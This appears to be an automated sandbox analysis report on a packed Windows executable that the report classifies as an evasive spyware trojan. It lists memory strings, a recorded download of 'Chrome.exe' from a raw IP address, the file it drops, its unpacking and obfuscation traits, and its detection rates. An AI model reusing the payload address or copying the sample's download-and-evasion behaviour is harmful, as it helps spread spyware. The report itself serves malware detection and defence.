            Source: 84Xhvb840M.exe, 00000000.00000002.341049588.00000000038E1000.00000004.00000001.sdmp, 84Xhvb840M.exe, 00000000.00000002.341110308.0000000003980000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id13Response
            Source: 84Xhvb840M.exe, 00000000.00000002.341049588.00000000038E1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id14
            Source: 84Xhvb840M.exe, 00000000.00000002.341049588.00000000038E1000.00000004.00000001.sdmp, 84Xhvb840M.exe, 00000000.00000002.341110308.0000000003980000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id14Response
            Source: 84Xhvb840M.exe, 00000000.00000002.341049588.00000000038E1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id15
            Source: 84Xhvb840M.exe, 00000000.00000002.341049588.00000000038E1000.00000004.00000001.sdmp, 84Xhvb840M.exe, 00000000.00000002.341110308.0000000003980000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id15Response
            Source: 84Xhvb840M.exe, 00000000.00000002.341110308.0000000003980000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id15V
            Source: 84Xhvb840M.exe, 00000000.00000002.341049588.00000000038E1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id16
            Source: 84Xhvb840M.exe, 00000000.00000002.341049588.00000000038E1000.00000004.00000001.sdmp, 84Xhvb840M.exe, 00000000.00000002.341110308.0000000003980000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id16Response
            Source: 84Xhvb840M.exe, 00000000.00000002.341049588.00000000038E1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id17
            Source: 84Xhvb840M.exe, 00000000.00000002.341049588.00000000038E1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id17Response
            Source: 84Xhvb840M.exe, 00000000.00000002.341049588.00000000038E1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id18
            Source: 84Xhvb840M.exe, 00000000.00000002.341049588.00000000038E1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id18Response
            Source: 84Xhvb840M.exe, 00000000.00000002.341049588.00000000038E1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id19
            Source: 84Xhvb840M.exe, 00000000.00000002.341049588.00000000038E1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id19Response
            Source: 84Xhvb840M.exe, 00000000.00000002.341049588.00000000038E1000.00000004.00000001.sdmp, 84Xhvb840M.exe, 00000000.00000002.341110308.0000000003980000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id1Response
            Source: 84Xhvb840M.exe, 00000000.00000002.341049588.00000000038E1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id2
            Source: 84Xhvb840M.exe, 00000000.00000002.341049588.00000000038E1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id20
            Source: 84Xhvb840M.exe, 00000000.00000002.341049588.00000000038E1000.00000004.00000001.sdmp, 84Xhvb840M.exe, 00000000.00000002.341110308.0000000003980000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id20Response
            Source: 84Xhvb840M.exe, 00000000.00000002.341049588.00000000038E1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id21
            Source: 84Xhvb840M.exe, 00000000.00000002.341049588.00000000038E1000.00000004.00000001.sdmp, 84Xhvb840M.exe, 00000000.00000002.341110308.0000000003980000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id21Response
            Source: 84Xhvb840M.exe, 00000000.00000002.341049588.00000000038E1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id22
            Source: 84Xhvb840M.exe, 00000000.00000002.341549842.0000000003DA9000.00000004.00000001.sdmp, 84Xhvb840M.exe, 00000000.00000002.341049588.00000000038E1000.00000004.00000001.sdmp, 84Xhvb840M.exe, 00000000.00000002.341110308.0000000003980000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id22Response
            Source: 84Xhvb840M.exe, 00000000.00000002.341049588.00000000038E1000.00000004.00000001.sdmp, 84Xhvb840M.exe, 00000000.00000002.341110308.0000000003980000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id23
            Source: 84Xhvb840M.exe, 00000000.00000002.341549842.0000000003DA9000.00000004.00000001.sdmp, 84Xhvb840M.exe, 00000000.00000002.341049588.00000000038E1000.00000004.00000001.sdmp, 84Xhvb840M.exe, 00000000.00000002.341099277.000000000397C000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id23Response
            Source: 84Xhvb840M.exe, 00000000.00000002.341049588.00000000038E1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id24
            Source: 84Xhvb840M.exe, 00000000.00000002.341049588.00000000038E1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id24Response
            Source: 84Xhvb840M.exe, 00000000.00000002.341049588.00000000038E1000.00000004.00000001.sdmp, 84Xhvb840M.exe, 00000000.00000002.341110308.0000000003980000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id2Response
            Source: 84Xhvb840M.exe, 00000000.00000002.341049588.00000000038E1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id3
            Source: 84Xhvb840M.exe, 00000000.00000002.341049588.00000000038E1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id3Response
            Source: 84Xhvb840M.exe, 00000000.00000002.341049588.00000000038E1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id4
            Source: 84Xhvb840M.exe, 00000000.00000002.341049588.00000000038E1000.00000004.00000001.sdmp, 84Xhvb840M.exe, 00000000.00000002.341110308.0000000003980000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id4Response
            Source: 84Xhvb840M.exe, 00000000.00000002.341049588.00000000038E1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id5
            Source: 84Xhvb840M.exe, 00000000.00000002.341049588.00000000038E1000.00000004.00000001.sdmp, 84Xhvb840M.exe, 00000000.00000002.341110308.0000000003980000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id5Response
            Source: 84Xhvb840M.exe, 00000000.00000002.341049588.00000000038E1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id6
            Source: 84Xhvb840M.exe, 00000000.00000002.341049588.00000000038E1000.00000004.00000001.sdmp, 84Xhvb840M.exe, 00000000.00000002.341110308.0000000003980000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id6Response
            Source: 84Xhvb840M.exe, 00000000.00000002.341049588.00000000038E1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id7
            Source: 84Xhvb840M.exe, 00000000.00000002.341049588.00000000038E1000.00000004.00000001.sdmp, 84Xhvb840M.exe, 00000000.00000002.341110308.0000000003980000.00000004.00000001.sdmp, 84Xhvb840M.exe, 00000000.00000002.341497974.0000000003D45000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id7Response
            Source: 84Xhvb840M.exe, 00000000.00000002.341049588.00000000038E1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id8
            Source: 84Xhvb840M.exe, 00000000.00000002.341049588.00000000038E1000.00000004.00000001.sdmp, 84Xhvb840M.exe, 00000000.00000002.341497974.0000000003D45000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id8Response
            Source: 84Xhvb840M.exe, 00000000.00000002.341049588.00000000038E1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id9
            Source: 84Xhvb840M.exe, 00000000.00000002.341049588.00000000038E1000.00000004.00000001.sdmp, 84Xhvb840M.exe, 00000000.00000002.341110308.0000000003980000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id9Response
            Source: 84Xhvb840M.exe, 00000000.00000002.342367539.00000000049A8000.00000004.00000001.sdmp, 84Xhvb840M.exe, 00000000.00000002.341952023.0000000004937000.00000004.00000001.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: 84Xhvb840M.exe, 00000000.00000002.341049588.00000000038E1000.00000004.00000001.sdmpString found in binary or memory: https://api.ip.sb/ip
            Source: 84Xhvb840M.exe, 00000000.00000002.342367539.00000000049A8000.00000004.00000001.sdmp, 84Xhvb840M.exe, 00000000.00000002.341952023.0000000004937000.00000004.00000001.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: 84Xhvb840M.exe, 00000000.00000002.342367539.00000000049A8000.00000004.00000001.sdmp, 84Xhvb840M.exe, 00000000.00000002.341952023.0000000004937000.00000004.00000001.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: 84Xhvb840M.exe, 00000000.00000002.342367539.00000000049A8000.00000004.00000001.sdmp, 84Xhvb840M.exe, 00000000.00000002.341952023.0000000004937000.00000004.00000001.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: 84Xhvb840M.exe, 00000000.00000002.342367539.00000000049A8000.00000004.00000001.sdmp, 84Xhvb840M.exe, 00000000.00000002.341952023.0000000004937000.00000004.00000001.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: 84Xhvb840M.exe, 00000000.00000002.342367539.00000000049A8000.00000004.00000001.sdmp, 84Xhvb840M.exe, 00000000.00000002.341952023.0000000004937000.00000004.00000001.sdmpString found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
            Source: 84Xhvb840M.exe, 00000000.00000002.342367539.00000000049A8000.00000004.00000001.sdmp, 84Xhvb840M.exe, 00000000.00000002.341952023.0000000004937000.00000004.00000001.sdmpString found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: 84Xhvb840M.exe, 00000000.00000002.342367539.00000000049A8000.00000004.00000001.sdmp, 84Xhvb840M.exe, 00000000.00000002.341952023.0000000004937000.00000004.00000001.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
            Source: global trafficHTTP traffic detected: GET /Chrome.exe HTTP/1.1Host: 94.250.250.30Connection: Keep-Alive
            Source: 84Xhvb840M.exe, 00000000.00000002.336599037.0000000000AFA000.00000004.00000020.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

            System Summary:

            barindex
            PE file has nameless sectionsShow sources
            Source: 84Xhvb840M.exeStatic PE information: section name:
            Source: 84Xhvb840M.exeStatic PE information: section name:
            Source: 84Xhvb840M.exeStatic PE information: section name:
            Source: 84Xhvb840M.exeStatic PE information: section name:
            Source: 84Xhvb840M.exeStatic PE information: section name:
            Source: 84Xhvb840M.exeStatic PE information: section name:
            Source: 84Xhvb840M.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
            Source: C:\Users\user\Desktop\84Xhvb840M.exeCode function: 0_2_0068808A0_2_0068808A
            Source: C:\Users\user\Desktop\84Xhvb840M.exeCode function: 0_2_006881340_2_00688134
            Source: C:\Users\user\Desktop\84Xhvb840M.exeCode function: 0_2_006282FB0_2_006282FB
            Source: C:\Users\user\Desktop\84Xhvb840M.exeCode function: 0_2_00623B680_2_00623B68
            Source: C:\Users\user\Desktop\84Xhvb840M.exeCode function: 0_2_0064A48D0_2_0064A48D
            Source: C:\Users\user\Desktop\84Xhvb840M.exeCode function: 0_2_005D7DFF0_2_005D7DFF
            Source: C:\Users\user\Desktop\84Xhvb840M.exeCode function: 0_2_005E7DFD0_2_005E7DFD
            Source: C:\Users\user\Desktop\84Xhvb840M.exeCode function: 0_2_005CFDE70_2_005CFDE7
            Source: C:\Users\user\Desktop\84Xhvb840M.exeCode function: 0_2_005CDE010_2_005CDE01
            Source: C:\Users\user\Desktop\84Xhvb840M.exeCode function: 0_2_005D9E360_2_005D9E36
            Source: C:\Users\user\Desktop\84Xhvb840M.exeCode function: 0_2_005D1E330_2_005D1E33
            Source: C:\Users\user\Desktop\84Xhvb840M.exeCode function: 0_2_005DBF060_2_005DBF06
            Source: C:\Users\user\Desktop\84Xhvb840M.exeCode function: 0_2_005E3F990_2_005E3F99
            Source: 84Xhvb840M.exe, 00000000.00000002.336614400.0000000000B18000.00000004.00000020.sdmpBinary or memory string: OriginalFilenameclr.dllT vs 84Xhvb840M.exe
            Source: 84Xhvb840M.exe, 00000000.00000002.336050056.0000000000442000.00000080.00020000.sdmpBinary or memory string: OriginalFilenameW2gUpyDh4 vs 84Xhvb840M.exe
            Source: 84Xhvb840M.exe, 00000000.00000002.336029416.0000000000438000.00000040.00020000.sdmpBinary or memory string: OriginalFilenameBowsprit.exe4 vs 84Xhvb840M.exe
            Source: 84Xhvb840M.exe, 00000000.00000002.341110308.0000000003980000.00000004.00000001.sdmpBinary or memory string: OriginalFilename vs 84Xhvb840M.exe
            Source: 84Xhvb840M.exe, 00000000.00000002.336773347.0000000000D51000.00000040.00000001.sdmpBinary or memory string: OriginalFilename vs 84Xhvb840M.exe
            Source: 84Xhvb840M.exe, 00000000.00000002.336773347.0000000000D51000.00000040.00000001.sdmpBinary or memory string: OriginalFilenameSV vs 84Xhvb840M.exe
            Source: 84Xhvb840M.exe, 00000000.00000003.272497046.0000000000CF0000.00000004.00000001.sdmpBinary or memory string: OriginalFilename vs 84Xhvb840M.exe
            Source: 84Xhvb840M.exe, 00000000.00000003.272497046.0000000000CF0000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameSV vs 84Xhvb840M.exe
            Source: 84Xhvb840M.exeBinary or memory string: OriginalFilenameW2gUpyDh4 vs 84Xhvb840M.exe
            Source: 84Xhvb840M.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESERVED size: 0x100000 address: 0x0
            Source: 84Xhvb840M.exeStatic PE information: Section: ZLIB complexity 1.00040643064
            Source: 84Xhvb840M.exeStatic PE information: Section: ZLIB complexity 1.0107421875
            Source: 84Xhvb840M.exeStatic PE information: Section: ZLIB complexity 1.0107421875
            Source: 84Xhvb840M.exeStatic PE information: Section: ZLIB complexity 1.021484375
            Source: 84Xhvb840M.exeVirustotal: Detection: 33%
            Source: 84Xhvb840M.exeMetadefender: Detection: 38%
            Source: 84Xhvb840M.exeReversingLabs: Detection: 78%
            Source: C:\Users\user\Desktop\84Xhvb840M.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: C:\Users\user\Desktop\84Xhvb840M.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32Jump to behavior
            Source: C:\Users\user\Desktop\84Xhvb840M.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId=&apos;1&apos;
            Source: C:\Users\user\Desktop\84Xhvb840M.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
            Source: C:\Users\user\Desktop\84Xhvb840M.exeFile created: C:\Users\user\AppData\Local\YandexJump to behavior
            Source: C:\Users\user\Desktop\84Xhvb840M.exeFile created: C:\Users\user\AppData\Local\Temp\Chrome.exeJump to behavior
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@1/1@0/2
            Source: C:\Users\user\Desktop\84Xhvb840M.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
            Source: C:\Users\user\Desktop\84Xhvb840M.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
            Source: 0.2.84Xhvb840M.exe.400000.0.unpack, ue061.csCryptographic APIs: 'CreateDecryptor'
            Source: 0.2.84Xhvb840M.exe.400000.0.unpack, ue03d.csCryptographic APIs: 'CreateDecryptor'
            Source: 84Xhvb840M.exeStatic file information: File size 1607424 > 1048576
            Source: 84Xhvb840M.exeStatic PE information: Raw size of is bigger than: 0x100000 < 0x126600
            Source: Binary string: Z:\Development\SecureEngine\src\plugins_manager\internal_plugins\embedded dlls\TlsHelperXBundler\Release\XBundlerTlsHelper.pdb source: 84Xhvb840M.exe, 00000000.00000003.272872650.00000000035F0000.00000004.00000001.sdmp, 84Xhvb840M.exe, 00000000.00000002.336058489.0000000000444000.00000040.00020000.sdmp

            Data Obfuscation:

            barindex
            Detected unpacking (overwrites its own PE header)Show sources
            Source: C:\Users\user\Desktop\84Xhvb840M.exeUnpacked PE file: 0.2.84Xhvb840M.exe.400000.0.unpack
            Detected unpacking (changes PE section rights)Show sources
            Source: C:\Users\user\Desktop\84Xhvb840M.exeUnpacked PE file: 0.2.84Xhvb840M.exe.400000.0.unpack Unknown_Section0:EW;Unknown_Section1:EW;Unknown_Section2:EW;Unknown_Section3:EW;Unknown_Section4:EW;.rsrc:EW;Unknown_Section6:EW;.QWly1rx:EW;.adata:EW; vs Unknown_Section0:ER;Unknown_Section1:EW;Unknown_Section2:EW;
            .NET source code contains potential unpackerShow sources
            Source: 0.2.84Xhvb840M.exe.400000.0.unpack, ue05f.cs.Net Code: ? System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: C:\Users\user\Desktop\84Xhvb840M.exeCode function: 0_2_006B5CFC push eax; ret 0_2_006B5D79
            Source: C:\Users\user\Desktop\84Xhvb840M.exeCode function: 0_2_006AE866 push edx; mov dword ptr [esp], eax0_2_006AE911
            Source: C:\Users\user\Desktop\84Xhvb840M.exeCode function: 0_2_006E2061 push ecx; mov dword ptr [esp], edi0_2_006E20E9
            Source: C:\Users\user\Desktop\84Xhvb840M.exeCode function: 0_2_0069D07A push ecx; mov dword ptr [esp], ebx0_2_0069D073
            Source: C:\Users\user\Desktop\84Xhvb840M.exeCode function: 0_2_00624079 push edx; mov dword ptr [esp], 206B50F6h0_2_00624379
            Source: C:\Users\user\Desktop\84Xhvb840M.exeCode function: 0_2_00624079 push 3863B1B1h; mov dword ptr [esp], esi0_2_00624653
            Source: C:\Users\user\Desktop\84Xhvb840M.exeCode function: 0_2_005E6070 push eax; mov dword ptr [esp], 41339E61h0_2_005E60E3
            Source: C:\Users\user\Desktop\84Xhvb840M.exeCode function: 0_2_005E6070 push edi; mov dword ptr [esp], ebp0_2_005E610D
            Source: C:\Users\user\Desktop\84Xhvb840M.exeCode function: 0_2_005E6070 push esi; mov dword ptr [esp], 00000024h0_2_005E6136
            Source: C:\Users\user\Desktop\84Xhvb840M.exeCode function: 0_2_005E6070 push edx; mov dword ptr [esp], 09FF1BC3h0_2_005E617C
            Source: C:\Users\user\Desktop\84Xhvb840M.exeCode function: 0_2_005E6070 push edi; mov dword ptr [esp], ebx0_2_005E6219
            Source: C:\Users\user\Desktop\84Xhvb840M.exeCode function: 0_2_005E6070 push 727367B7h; mov dword ptr [esp], eax0_2_005E62B7
            Source: C:\Users\user\Desktop\84Xhvb840M.exeCode function: 0_2_0062C05B push 69738D1Eh; mov dword ptr [esp], eax0_2_0062C01F
            Source: C:\Users\user\Desktop\84Xhvb840M.exeCode function: 0_2_0062C05B push 010F4759h; mov dword ptr [esp], ebx0_2_0062C055
            Source: C:\Users\user\Desktop\84Xhvb840M.exeCode function: 0_2_00687852 push 1EBA6AB6h; mov dword ptr [esp], ebp0_2_0068789D
            Source: C:\Users\user\Desktop\84Xhvb840M.exeCode function: 0_2_0069A020 push eax; mov dword ptr [esp], esi0_2_0069A04D
            Source: C:\Users\user\Desktop\84Xhvb840M.exeCode function: 0_2_0069A020 push ebx; mov dword ptr [esp], eax0_2_0069A067
            Source: C:\Users\user\Desktop\84Xhvb840M.exeCode function: 0_2_0069A020 push 6186AC4Ah; mov dword ptr [esp], edx0_2_0069A0D8
            Source: C:\Users\user\Desktop\84Xhvb840M.exeCode function: 0_2_006B8027 push ecx; mov dword ptr [esp], 2F07279Bh0_2_006B803A
            Source: C:\Users\user\Desktop\84Xhvb840M.exeCode function: 0_2_0069403C push 1D0C423Bh; mov dword ptr [esp], ebp0_2_00694067
            Source: C:\Users\user\Desktop\84Xhvb840M.exeCode function: 0_2_0069403C push esi; mov dword ptr [esp], edi0_2_00694111
            Source: C:\Users\user\Desktop\84Xhvb840M.exeCode function: 0_2_0062F037 push edx; mov dword ptr [esp], ebp0_2_0062F04E
            Source: C:\Users\user\Desktop\84Xhvb840M.exeCode function: 0_2_0064B833 push esi; mov dword ptr [esp], 7F4715ABh0_2_0064B870
            Source: C:\Users\user\Desktop\84Xhvb840M.exeCode function: 0_2_0062B007 push 68A38B29h; mov dword ptr [esp], esi0_2_0062B170
            Source: C:\Users\user\Desktop\84Xhvb840M.exeCode function: 0_2_0062B007 push edx; mov dword ptr [esp], ebp0_2_0062B663
            Source: C:\Users\user\Desktop\84Xhvb840M.exeCode function: 0_2_0062B007 push edi; mov dword ptr [esp], 753A9C2Ah0_2_0062B9CD
            Source: C:\Users\user\Desktop\84Xhvb840M.exeCode function: 0_2_006D5002 push esi; mov dword ptr [esp], ebp0_2_006D5033
            Source: C:\Users\user\Desktop\84Xhvb840M.exeCode function: 0_2_006D5002 push 5DBDB758h; mov dword ptr [esp], ebx0_2_006D5056
            Source: C:\Users\user\Desktop\84Xhvb840M.exeCode function: 0_2_006D5002 push ebp; mov dword ptr [esp], ebx0_2_006D5071
            Source: C:\Users\user\Desktop\84Xhvb840M.exeCode function: 0_2_006D5002 push ebp; mov dword ptr [esp], 1EAE0ABBh0_2_006D5089
            Source: C:\Users\user\Desktop\84Xhvb840M.exeCode function: 0_2_006B7815 push eax; mov dword ptr [esp], ebx0_2_006B780E
            Source: 84Xhvb840M.exeStatic PE information: section name:
            Source: 84Xhvb840M.exeStatic PE information: section name:
            Source: 84Xhvb840M.exeStatic PE information: section name:
            Source: 84Xhvb840M.exeStatic PE information: section name:
            Source: 84Xhvb840M.exeStatic PE information: section name:
            Source: 84Xhvb840M.exeStatic PE information: section name:
            Source: 84Xhvb840M.exeStatic PE information: section name: .QWly1rx
            Source: 84Xhvb840M.exeStatic PE information: section name: .adata
            Source: 84Xhvb840M.exeStatic PE information: real checksum: 0x3aa0b3 should be: 0x1950c3
            Source: initial sampleStatic PE information: section name: entropy: 7.99802724381
            Source: initial sampleStatic PE information: section name: entropy: 7.77053321914
            Source: initial sampleStatic PE information: section name: entropy: 7.80942798026
            Source: initial sampleStatic PE information: section name: entropy: 7.57592238998
            Source: initial sampleStatic PE information: section name: .QWly1rx entropy: 7.91678620478
            Source: C:\Users\user\Desktop\84Xhvb840M.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\84Xhvb840M.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\84Xhvb840M.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\84Xhvb840M.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\84Xhvb840M.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\84Xhvb840M.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\84Xhvb840M.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\84Xhvb840M.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\84Xhvb840M.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\84Xhvb840M.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\84Xhvb840M.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\84Xhvb840M.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\84Xhvb840M.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\84Xhvb840M.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\84Xhvb840M.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\84Xhvb840M.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\84Xhvb840M.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\84Xhvb840M.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\84Xhvb840M.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\84Xhvb840M.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\84Xhvb840M.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\84Xhvb840M.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\84Xhvb840M.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\84Xhvb840M.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\84Xhvb840M.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\84Xhvb840M.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\84Xhvb840M.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\84Xhvb840M.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\84Xhvb840M.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\84Xhvb840M.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\84Xhvb840M.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\84Xhvb840M.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\84Xhvb840M.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\84Xhvb840M.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\84Xhvb840M.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\84Xhvb840M.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\84Xhvb840M.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\84Xhvb840M.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\84Xhvb840M.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\84Xhvb840M.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\84Xhvb840M.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\84Xhvb840M.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\84Xhvb840M.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\84Xhvb840M.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\84Xhvb840M.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\84Xhvb840M.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\84Xhvb840M.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\84Xhvb840M.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\84Xhvb840M.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\84Xhvb840M.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\84Xhvb840M.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\84Xhvb840M.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\84Xhvb840M.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\84Xhvb840M.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\84Xhvb840M.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\84Xhvb840M.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\84Xhvb840M.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\84Xhvb840M.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\84Xhvb840M.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\84Xhvb840M.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\84Xhvb840M.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\84Xhvb840M.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\84Xhvb840M.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
